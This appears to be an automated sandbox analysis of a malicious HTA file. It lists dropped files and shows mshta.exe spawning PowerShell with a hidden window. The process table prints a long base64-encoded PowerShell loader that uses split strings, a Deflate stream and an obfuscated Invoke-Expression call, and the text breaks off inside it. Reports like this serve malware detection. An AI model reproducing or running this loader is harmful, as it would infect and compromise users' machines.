Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
new-riii-1-b.pub.hta
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\UAGVQ199I7H3ZT4G1PSFXCX6W.exe
|
HTML document, Unicode text, UTF-8 text, with very long lines (986)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfcwwmgq.gat.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gscs4evv.rkw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hyfx1lwm.1uo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlyzcixi.zsd.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\new-riii-1-b.pub.hta"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA0AFYAUQAwAGEAcgBjAHAANQBaAEMATwBjAEsAaABPAHgAeQBBAEMAVABFAEsAcABlAFUAbABMAHMAUQBiAE8ARgAxAFYAMABCAHIAcwA2AFEAbwBlAGcAZQBaAFkAbwBXAEkAYgBWAHcATQBJAEoAQwB4AEsATwBuADYAMwBpAE4AbQBFADYAYQBNAG4ARwBOADAAVQA3ADMATwB4AEgAUABGAEcAUwBjAG0AWgBlAHkAYQBqAEkAbAB3AEYAbABXAEQAbQB5ADAAagBGAEIAWgBoAHkAZABFAHMAaABUAHcAegBlAGkATQA3AGMANABrAGUAbwBTAFoAOAB1ADgAdQBrAGoAVAB1ADAAdgBQAG8ASABTAHoAMQBkAGUAWQAzAFUATgBtAG0AYgBzAHcAagBpAE8AUABuAGoAbQAwAGIANgAyAEEAMQBZAFgASAB0AFIAcQBaADkAQgBOAHkAegBqAFAAYQBpAHkANABrADgASABnADAAUQBFAEsANQB1AGUAbgBlAGEATQBOAFgAagA2AHcAdwBMADIAaQBIADMAdgAzAG8AdABtAFIAVgByAHgAdABIAHoAZQBNADEANgBXAHIAUwA1AEcAZABUAE4AeAB4AGEAcgBSAHYAegBnAGkAVwBZADcAYwBtAGYARgBjAFIAdQAxAHkAQgA2ADEAUAA2ADMAeQBIAEkAUgBsAEUAcQBQAEoARgBaADMAZgA5AHoAaAB3AFkAZwBHADMAYgBCAEgAcQA0AEcAagByAEMAawBuAFIAcABPAGsAbQBLAE4AMQBQAFYAdwBTAFAAZwBDAE8AbgBwAEsAeABYAEwARgBKAHMASQBxAEoAbwBUAEwASwBhAHMAQwAxAGgASQB1AE4ASgBvAGEAaABQAFEAYQBNADcATQBUAFMAdAB6ADcATAB6AEkAWgA0AEcAbwBmAFAARQByAFUAdQBRADgAbwAyAFcAZQBSAG4AQwBGADYAUwBHAFAANgA2AHYAbQA5AE4AdAByAEYAcwB6ADcAUwAwAEQASgBGAHEAcQB6AEUAcQB4AFoAdwBoAFMAQwBLAG8AQgBuAGkAZwA5ADMAMwBFAEEAQgBaAHAAaQBZAHYAYQA5AGUAdwBCAGsAOABnAEsAWABFAEUAbQBUAG8AOQBrAHoAWQBnAGMAaQBGAG4ARABCAGQAWgBMAG4AbABYAGsATABKADkAYgAxAHUAUwBSAEcATgB3AFUAdABMAHcAdwA1AFIAZAB4AHcAMwBhAHYAUQBnAHAAQgBNADcAMgB1AGkATQByAGIAWQBlAEYATgB3AE4ATABQAFUARQBtAGgAdQAwAE4AbABaADQAawBYAGoANQBFAHAANwBoADAAdQBkAHIAdAAxAEQAZwBMAHgAbQBTAGIAaAB4ADQAYgA1AGEAaAAxAFYAawBDADYAUwBnAGkAOQBhADYAcABpAEoAWQBIAGYAUwBHAEgAcgA4ADIAVgBPAG4AZgA1AEwAdABmAEUAVABBAGkAMQBWADYAMQA1AGoAWABvAHgATwBKADUATABUAG8ATgBCAEUAVQA2AEYAUwA2AHIASwBHAEMAYQBkAHkAdgBiADIAegBnAEgANABCAHEAcwAwAEsANQBYAHkAagBHAHcASQBQADAAYQBmAGgAMgBMAEYAZwAxADMAMABxAGsARQA0ADQAYQBUAGUANABCAHQAVgBuAEMAdABpAGQAZgBqAHQAdAA1AGkAUABwAFgAQQA5AHgAZwAxAGEAUwBOAHUAMQBXAFMAZwByAGcAMQBLAFYARwBSADgAcQB0ADkAUgBYAGMARQA5AHUAZwBqAGwAYQBBADMAQwBoADcAUABsAGgAYgBXAGUAQgBXAHgAQQBUAEMASQA5AGsAbABYADQAcQBjAEYAeAA1ADQAZwBVAHoATgBlAGsAVgBKAHYAdwB6AG8AMwBRAHUANQBYAHMAMwBiAGoARwBPADEAYgB3AEUASABkAG8AIAA9ACAAJAB0AFIAdQBFAA0ACgAkAEsAbAB3AFoAMgB2AFgANABDAEgAOQBlAGwAawA2AFYAOQBvADcAWQBSAEIATABFAHkANwBxAGgATgBFAHMAMQAzADMAcwBzAFIAegBJAGQAbwBPADcARABXADEAeAA0AG4AUgBTAEMAbQBlADgAaABlAFIAWgBmAGMAaABUADMATABrAEIAVwBoADkARABLAFMAUwBuAGUAbABqAHgAaQBuAE4AQwBvADUAbQBwAGkAegByAEMAcwBHAG4AVgBlAGoAcwA0AGgAWgBFADMATABQAFAAbwBTAE8AZwB1AEgASwBPAHIAaABJAHcAMABRADkARQBuAHEAZgBDAGUAeQBNAGgAUwB1AHAAZwB6AHUAMQAzAE4AYwA3ADQAWABOADkASQA1AFIANQBGAGYAVgA1AFEANQBGAG4AVAA4AGIAUgBtAGEANQBrAHMANQBPADkAZgBmAHcAaABVAE0ANgA5AGoAYgBBAFEAUABRAG0AcwBKAGgAWgB6AEsASgB4AGYAWgA1AFkAWQAzAFcASgBQAFAAdwBtADQAVgBTADQAcABQAHEARwAyAFMAWAB0ADcATQBSAEgAYQBwAHUASwBFAFgAdwB5AFcANQA4AE4ASAA2AGkAZQA3AE4ARAAxAHkATgBLAGoARQAgAD0AIAAkAE4AdQBMAGwADQAKACQATQBqADYAawB6ADIAZgBtAGcAegBPAEwANgBLAFIAMQBuAEcAUgBQAEwAUgA3ADYAdAAwAEcAQwA0AE4AYgBiAGYAVABaAEQAQwA4AGwAcwBiAFMAUwA5AHIAVQA2AG8AdgBpAHkATQBZAGEAeQBkAGEAdQB6ADYAMABhAGYAYgB2AEwAegBaAGUAVQBKAGQAcABhAGEAdQBzADcAQwAxAHgAbgBRAFAAVgBsAEIAOAA1AEIASQBHADUAZABSADYATQB5AGMAdABUAG8AVwBrAEYAWgBFAEQAMgBmAFIAVQBuAHoATQBkAE4AagA3AFAAVABFADEANQBnAE8AOABxAE0AOQBmAFMAagB6AGcAUwBMAGoAQwBCAHMAMABBAEgARQAzAFcANQBtAFEAZwBHADYARwA5AEoAbgBEAFAARABSAHMATwA1AGIAeQBEADYAZwB2AGsAWgBwAFgAUQBXAGEAcgB1AEsAQQBtAGkAZwByAE0AbwBhAEgAYgBLAHgANQA4AHUARgA0AHoANQBBAGsAZgA5AFQATwB4AHcAdgBFADAAegBSADIAMQBPAHUAWgBKAEoARgBrAHAAagB0ADcAMgBqAEUAcwA1AGgAUQBLAGkAUAB1AHIAWgA1ADgAaABlADMARQBIAFcAVQBkAFMAWgBtAGoAegBVAFEAbABjAFkAUQBJAE4AeABmAHgAeQBvAGEAbgA1AEUANgBXAGUAYwBqAHoAbABOAHIAZABBAHAAUAB6AEsATQBvAFcAWQB6AFYAcgBoAEoATgBWADgAMgBSADYAZgBVAHIAbgBHADYAOQA0AGoAbgBYADQASQBiAHMAdwBEADQASwBIAHUASwA1AHYAUwBCAG4AaABpAGsAbABpAEkAZQBXAFkASwB4AFIAbABGADIAcABRAGYAcABUAFEASQA3AEIAYQBoAGkAaABhAE4AbwBYAGkAMABoAGkAdABOAEQAVQBLAGkAQgBmAFQARAB0ADMAUABGAGMAWQBKAGYAZwBoAEYAdABnAHgAbAAxAEkAdQBCAGIAUQAzAGgAWAB1AGkARgBFAHgAcABUAFAAdwB6AEQAUwAyAHIAcABiADYAcQBuAFIAbABrAHEATQBOAGMATwB2AFAAWAB6AHgAdAB4AGMAawB5ADcAZgAwAEwAdABVAG4AbgB2AHgANABPAFIAVwBaAFIAdgAwAHgAQgBBAHYAOABlADYAdgBLAG4AZgBwAEoAUgA0AGYAeABwAGcAagBUAEYAUgB4AEcAZwA2AEkAMwA2AEsASwBJADgAcwBIADMAcgBCADcAegBmAFcANwA2AE8AVABCAFYANwBZAG4AMwBPAHAAMwBDAEoATQBNAHQAbQB6AEgASwBiADIAMgBtADgAbgBoAHcANABmAE8AbQBWAGMAZwB4AG0AWAA2AGUAVQBSAFIAZgAyAHAAbQBDAGgAcwBKAGkANwBCADUAdwBUAGgAMgBuADMAcAByADYAcgBvAGgASgBPAE8AUAA2AGsANgB0AE4AbABMADgAegBGAFQAcgBWAGwAaQBaAEQAdQBDAGkAMQBFAFAATwBTADMAcwBjADMAMQBtAFQATwAwAFgANQB0AFIAcABQAE4ATgBXAGMAdABGAEQAbQBSADAAdwBoAFkAdgB5AEsAbwBoAEQATAB4AHYAWABkAGgAZQAzADQAVABLAFoAeQB0AEMAdQB4AEoAegB4AGEAaQAxAHIAMABmAGwAUwBxAGsAcwBnAHEAUQBvAHEAUQAxAE0ARgBMAEkATABRAHkAdAA0AHoAVwBUAFYAbwBrAE0AcwBPAGYAQgBsAHIASgBuAE4ANQB5AGcAdQA0AFUAdgBhAGEAUwBFAGkAMgBOADIAWgBRAGkAVgAwAGQAdQB5AEQARgBRADgAMwBiAEcAOQBXAEEATABLAHIAYwA5AFMAVQBBAE0AZwBBAGMAdgB3AFAAVQBmAFQASwA2ADEAWQBjAHgAdABzAHYAVAB4AGcAWABJADUAeQBrAHkAZQB5AGEASQBVAGwAaQBhAFcAagBUAEEAcgA0AFUAbgBoAFgAWgBWAEMAegBBAHcAeABBAHQARQB4ADMAdABDAE4AUgBaAHAAUAB0AGsAUwAwAE8AYwBtAGcAawBHAEkAUQBKADEATABuAE0AQwBHAGsATwBFADMASwB2AGgAOQB4AGEANwByADMAcwBQADMASwBVAHkAUABiADIAVgBYAHIAMwBkAE0AbAB3AG0AaABIAHMARQBsAGUAZgA5AEkAWQBMAGQAYgBPADMAWAB5AFMAYwBYAGIAYwBEAE0AYQBqAGEAdABlAHQAdwB2ADYAagBEAGUASwBWADMAVQBPAGgAegBVAGQASwBXAHAANQAwAHMASQB0AEwAVwBxAHAAZABlAGQAdQBMAEoATgBsAFAAQgBIAG4AQgBhAFkAVQBCADgAVABLAGQAUwBSAHUAZwBBAEgAUABmAHcATABBAE8AeQBhAGoAQQBqACAAPQAiAEQAZQBmAGwAYQAiACAAKwAgACIAdABlAFMAdAByAGUAYQBtACIAOwAkAHUAdAAwAFQAawBaAFYASABiADcAQgAzADcARgBJAHgARgBSAEYAUgBDAGkAWABCAHkAaQBpAHMAZQAxAGIARwBmAFIAUQBWAHkASQA2ADgAUwBnAHMAWABUAGgATgA1AEwAawAwAHQAVABxAGEANgBBAGsAcQBuAEkAVQAwAEgAcAB2AHMAQQBmAFkAMABwAHgAbwBCADAAcABiAG0AQQBWAGsAUABrAEIAZQAyAE4AZgBjAHYAYgB6AEoAUgBnAHAAdABSAGcAbwBPAHEATwBHAHgAdQBxAGgARgBpADIAdgA3AEkAUABYAHgATABlAHUARQBpAGcAVgBpAHUAUQB1AFMAcgBvADcAcwBuAFAAUQA5ADYAUwBGAEQAZgB3AGgAZQBVAFQAQwA2ADYAegBZAEQAVABIADcAegBRAEUANgA1AE4AWgBSAFoAYQBpADIARwAzAGYAdgBWAFgAdgBkAHcAZgBjAHAAVgBaAHoAdQB0ADkANQBLAFUAaQBEADIASABIAGkAMABlAGUAMAB2ADAATwBiAEoARABKADIAMQBoAHgAUQBWAGEASABxAEgATgBtAFcAeQBTADIANwBLAGkAdgAzAHIAWQBFADQAZgBFAHIAVQBwAHAAcQBhADIAYgB1AHQAYwBxAFMANgBrAHUAZQBGAHkATgBaADgAVABpAE4AcgBtAHcAVABGAHYAMgBpAFUARABmAHQATQBqADUAcwBwAHkAZwAzADQAWABmADgAagBrAGIAbQB6AFkAZAA5AFUANgBCAGcAcQA0AGsAMABXAEEARwByAFAAawBKAE4AeABQADYATwAxADYAbwBBAGkAUgBSAFEAYQBrAHgAZABRAG8ANwBsAEcAbABrAFEAQgBFADkARgBOADgAcwBpAHoATgBPAFcAVQBUADMAdABkAHUASgBIAGgAWAA1AGQASgBrAEQASQBNAFQAMwBaAGsAWABmAGoAUgBnADcAMQBOAGYAMQB0AG0AawB4AGcAMgBDADIANQBtAFIAUgBNAEEAZwBYAHAAbABJAEsAZgA4AGUAdgBiADIAWAB2AFIATABJAFoARgBlAGcAcgBqAHkAcQBwAEUANwBwADIAdABtAHIANQBCAHMAVQBIADgATQByAGsAZABaAEsATgAxAHQAZwBEAGQAQwBEAFEAWABWAE4ATwBDAGkAWgA0AHIAWgBUAGUAVQByAHQASgB4AHoAUAA4AGcAWAB0AGkASwB2AEQAOQBHAGUAQgBNAEMARgAzAGQAdgBZAGEAMwBvAEoAVwBTAGcARAB0AFQARABUAEgARwBUAHoAcABiAEsAaABjAGoAcQBVAGsASQBxAGYAMwAxAEoAVwBiAHYAVQB6AFUAcQBTAEoAYwBSAHUARgBzAEcAWQBVAEwATgBFAEIAWABKAFkAMgB1AG0AdABLAG4AbgBRAHAAWAA4AFAAMgBKAG8AbABFAHgARgA3AHIAbABMADUASQA0AGwAcQBCAEQAbwBlAFMAOABjAEEAYQBzAEoASgA5AHkAYQBYAEYASQBPADIAOQBQACAAPQAgACIAQwBvAG0AcAByAGUAIgAgACsAIAAiAHMAcwBpAG8AbgAiADsAIAAkAEsAUQBrAHMAcQA3AFgAbwBVAHMAVwBxADAARABhAGMAVQBiADMAbABCAEgAbwBSAEIAWgB5AHEAdgBnAGUAQQBLAFAAagBQAHEASQBqAEoAVgBRAGYAMwBrADMAegBMAFkAVwBaAE0AZwBiADkAbQBtAFgASgBXADMAZgBmAHYAQQB0AGkAegB4AE8AZQBtAHMASQA1AHIAaQBSAHQAbQAwAFUAZABWAFoAagBSAGkAOQBLAFAAMQBvAHkASABrADQAagAwAFQAZQB3AFIANQBaAHYAVwA5AE0ANgBNAGkANQBkAEgATAB4AFgAdABQAGgAbABtAHgAUQBVAFoAOQBxAE8AZABDAFYARQBCAGcAYgBNAEIAcgBqAEMASABvAHUAMgA0AFMAWABOAEIAaQBZAEQAZgBCAGYAdQBHADkAZABSAFAAbQBlAFQAVwAxADgAUgBYAHkASQB4AHkAVwBHAEwAagBXAEsAcgBkAEoAVgBDADYAaQBTAHIAVwBCAEUAbQBwADEANgBYADgASABmAHAAVABjADMAQwBkAFYAUgBVAG0AcQA4AFAAdABxAGEAQQBHAE4ATQBrAEwAbABlAFAAbwBSAHYAWABoAE8AZQBiAEgAeABEAG8AcQBJAHMAdQByAGgAYwB1AEYANABlAE4ASgBiAG8AUwBNAGMASgBZAHIAOABJAHoAZgBmAEIASwAzADQAeQA4AEUAYQBWAHgAZwBHAHgAMABjAEMAQQBQAGUAVgBMAEMAOQBqAEQAOAAzAGUAagBSAGsAMQBTAEEAMgBHAFAAbABGAG8AeQBzAGoAeQBVAFAAcQBwAHAAZwBLAHMATwBWADAARQBTAGIAZAAzAG4AcAB4ADQAVwBDAEcARAA5ADMATABuAFkAcwBwADkAQQBQAGMAYwBBAHYARQB0AHoAVABNAEQATwBOAGIAegB4AGMAZgBKAEsAdgBRAHgAQwBEAGoARgBEAGoAZQBBAGoARgA0AHoAOAA4AHkANQBiAEUAeAAgAD0AIgBTAHQAcgBlAGEAIgAgACsAIAAiAG0AUgBlAGEAZABlAHIAIgA7ACAALgAoACIAaQAiACsAIgBlAHgAIgApACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgAkAEsAcQBLAFMAUQA3AFgAbwB1AHMAVwBRADAAZABBAGMAdQBiADMAbABCAGgAbwByAEIAWgBZAHEAdgBnAGUAQQBrAFAASgBwAHEASQBqAEoAVgBRAEYAMwBrADMAegBMAHkAdwBaAG0AZwBiADkAbQBtAFgAagB3ADMARgBmAFYAQQB0AEkAWgBYAE8ARQBtAFMASQA1AHIASQByAHQAbQAwAFUARABWAFoAagByAEkAOQBrAFAAMQBvAFkASABrADQASgAwAFQARQB3AFIANQBaAHYAVwA5AG0ANgBNAGkANQBkAGgATABYAFgAdABQAEgAbABtAHgAUQB1AHoAOQBxAG8AZABjAHYAZQBCAGcAQgBNAGIAcgBqAGMAaABvAHUAMgA0AHMAeABOAEIAaQBZAGQARgBCAEYAVQBHADkARABSAFAAbQBlAFQAVwAxADgAcgB4AFkAaQB4AFkAVwBnAEwASgBXAEsAUgBEAGoAVgBDADYASQBzAHIAVwBCAGUATQBQADEANgBYADgASABmAFAAVABDADMAYwBkAFYAcgB1AG0AUQA4AHAAdABxAEEAQQBHAG4AbQBrAGwAbABFAHAATwBSAFYAeABIAE8AZQBiAEgAeABEAE8AcQBJAFMAdQByAGgAYwB1AGYANABFAE4AagBCAE8AcwBtAGMAagB5AHIAOABpAHoARgBmAEIASwAzADQAWQA4AEUAQQBWAHgARwBnAHgAMABDAGMAQQBQAEUAdgBsAEMAOQBKAGQAOAAzAEUAagByAGsAMQBTAEEAMgBHAFAATABGAE8AeQBzAEoAWQB1AHAAUQBQAHAAZwBrAFMATwBWADAARQBzAGIARAAzAE4AUAB4ADQAdwBjAEcARAA5ADMATABOAFkAcwBQADkAQQBwAGMAYwBBAHYARQBUAHoAVABNAGQAbwBuAEIAWgBYAEMAZgBqAGsAVgBRAFgAYwBEAGoARgBEAEoAZQBhAGoARgA0AFoAOAA4AFkANQBCAEUAWAAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAG8ALgAkAFUAVAAwAFQASwBaAFYASABCADcAYgAzADcARgBJAHgARgBSAEYAUgBjAEkAWABCAFkAaQBpAFMARQAxAEIAZwBmAHIAUQBWAFkASQA2ADgAUwBnAHMAeAB0AEgAbgA1AGwAawAwAFQAdABxAGEANgBhAEsAUQBuAGkAdQAwAGgAcAB2AHMAYQBmAFkAMABwAHgAbwBCADAAUABiAE0AYQBWAGsAcABLAGIARQAyAE4ARgBjAFYAQgBaAGoAUgBHAHAAdAByAGcATwBvAFEATwBHAFgAVQBRAGgARgBJADIAdgA3AEkAcAB4AFgATABlAHUAZQBJAEcAdgBpAFUAUQBVAHMAcgBvADcAUwBuAFAAcQA5ADYAcwBGAGQARgBXAEgAZQBVAHQAQwA2ADYAWgBZAGQAdABoADcAWgBxAGUANgA1AE4AegBSAHoAQQBJADIARwAzAGYAVgBWAHgAdgBkAHcARgBjAHAAVgB6AHoAVQBUADkANQBLAFUAaQBkADIASABIAEkAMABlAGUAMAB2ADAATwBiAGoARABKADIAMQBoAHgAUQB2AEEAaABRAEgAbgBtAFcAWQBzADIANwBLAGkAVgAzAHIAWQBlADQARgBFAHIAVQBQAHAAcQBBADIAQgBVAFQAQwBxAHMANgBLAFUARQBGAFkATgBaADgAVABpAG4AUgBtAFcAVABmAHYAMgBpAHUARABGAHQAbQBqADUAcwBQAHkARwAzADQAWABmADgASgBLAGIATQBaAHkAZAA5AHUANgBiAEcAUQA0AEsAMABXAEEAZwBSAFAAawBqAE4AeABwADYATwAxADYATwBhAGkAUgByAFEAYQBrAHgARABxAG8ANwBsAEcAbABrAHEAYgBFADkAZgBuADgAcwBJAFoAbgBPAFcAVQB0ADMAVABkAHUAagBIAGgAWAA1AGQAagBLAEQAaQBNAFQAMwBaAEsAWABGAGoAcgBnADcAMQBOAGYAMQBUAE0AawBYAEcAMgBjADIANQBNAFIAUgBNAGEAZwB4AHAATABJAEsAZgA4AGUAVgBCADIAeAB2AHIATABpAFoARgBFAEcAcgBqAFkAcQBwAGUANwBwADIAVABtAHIANQBCAHMAVQBIADgATQBSAEsARAB6AGsAbgAxAFQAZwBkAEQAYwBkAFEAeABWAG4ATwBjAGkAWgA0AFIAWgB0AGUAVQBSAFQAagB4AFoAUAA4AGcAWAB0AEkAawB2AGQAOQBHAEUAYgBtAEMAZgAzAGQAdgB5AGEAMwBPAEoAVwBTAGcAZABUAHQAZAB0AGgAZwB0AFoAUABiAGsAaABjAGoAUQB1AGsASQBxAGYAMwAxAGoAVwBiAFYAdQBaAFUAUQBTAGoAYwBSAFUAZgBTAEcAeQBVAEwAbgBlAGIAeABKAHkAMgB1AE0AVABLAE4AbgBRAFAAWAA4AHAAMgBKAE8ATABlAFgARgA3AHIATABMADUAaQA0AEwAUQBCAGQAbwBFAHMAOABjAEEAYQBzAGoAagA5AFkAYQBYAGYAaQBPADIAOQBQAC4AJABtAGoANgBrAHoAMgBmAE0AZwBaAG8ATAA2AGsAcgAxAG4ARwByAFAAbAByADcANgB0ADAAZwBDADQAbgBCAEIARgB0AHoAZABjADgATABTAEIAUwBTADkAcgBVADYAbwBWAEkAeQBNAFkAYQBZAGQAYQBVAFoANgAwAGEAZgBCAHYATABaAFoAZQB1AEoARABwAEEAQQB1AHMANwBjADEAeABuAHEAUABWAGwAQgA4ADUAQgBpAEcANQBkAFIANgBNAFkAQwBUAHQATwBXAEsAZgBaAEUARAAyAEYAUgB1AG4AegBtAGQAbgBKADcAcAB0AGUAMQA1AGcAbwA4AFEATQA5AEYAcwBKAFoARwBzAEwAagBjAEIAUwAwAEEASABlADMAdwA1AG0AUQBnAEcANgBnADkASgBuAGQAcABEAFIAcwBPADUAQgBZAEQANgBHAFYAawBaAFAAWABxAFcAQQBSAHUASwBBAE0AaQBHAFIATQBvAEEASABiAGsAWAA1ADgAVQBGADQAWgA1AEEASwBGADkAVABPAHgAVwBWAGUAMABaAFIAMgAxAE8AdQBaAEoASgBGAGsAcABKAFQANwAyAGoAZQBzADUASABxAGsAaQBQAFUAUgBaADUAOABoAGUAMwBlAEgAVwB1AGQAUwB6AG0AagB6AFUAUQBsAGMAeQBxAGkAbgBYAGYAeAB5AE8AQQBOADUARQA2AFcAZQBDAGoAegBsAE4AcgBEAEEAcABwAHoASwBNAG8AdwB5AFoAVgByAGgASgBOAHYAOAAyAFIANgBmAHUAUgBuAEcANgA5ADQAagBOAHgANABJAGIAcwBXAGQANABrAGgAdQBLADUAVgBTAEIAbgBoAGkAawBsAEkAaQBlAFcAeQBLAFgAUgBsAGYAMgBwAFEAZgBwAFQAUQBpADcAQgBBAEgASQBoAGEAbgBvAHgASQAwAGgASQBUAG4AZABVAGsASQBCAGYAdABEAFQAMwBQAEYAQwBZAEoAZgBHAEgAZgBUAEcAWABMADEAaQB1AEIAQgBxADMASABYAHUASQBmAGUAeABQAFQAUAB3AFoARABzADIAcgBQAEIANgBxAE4AcgBMAGsAcQBtAE4AYwBPAHYAUAB4AFoAeAB0AHgAQwBrAFkANwBGADAAbABUAFUATgBOAFYAeAA0AE8AUgB3AHoAcgBWADAAWABCAEEAVgA4AEUANgBWAGsAbgBGAHAASgByADQAZgB4AFAAZwBKAHQAZgByAFgARwBHADYAaQAzADYASwBrAEkAOABzAGgAMwBSAGIANwBaAEYAVwA3ADYAbwB0AGIAVgA3AFkATgAzAG8AUAAzAEMAagBtAE0AdABNAHoAaABLAGIAMgAyAE0AOABuAEgAdwA0AGYAbwBNAHYAYwBHAHgATQBYADYARQBVAFIAUgBmADIAcABNAEMAaABTAGoASQA3AEIANQBXAHQAaAAyAG4AMwBQAHIANgBSAG8AaABKAG8ATwBQADYASwA2AFQATgBMAEwAOAB6AGYAdABSAFYAbABpAHoARABVAEMASQAxAGUAcABvAHMAMwBTAGMAMwAxAG0AVABvADAAWAA1AHQAcgBQAHAATgBOAFcAYwB0AEYAZABNAHIAMABXAEgAeQBWAHkASwBPAGgAZABsAFgAVgBYAGQASABlADMANAB0AGsAWgBZAFQAQwBVAHgASgB6AFgAYQBJADEAUgAwAE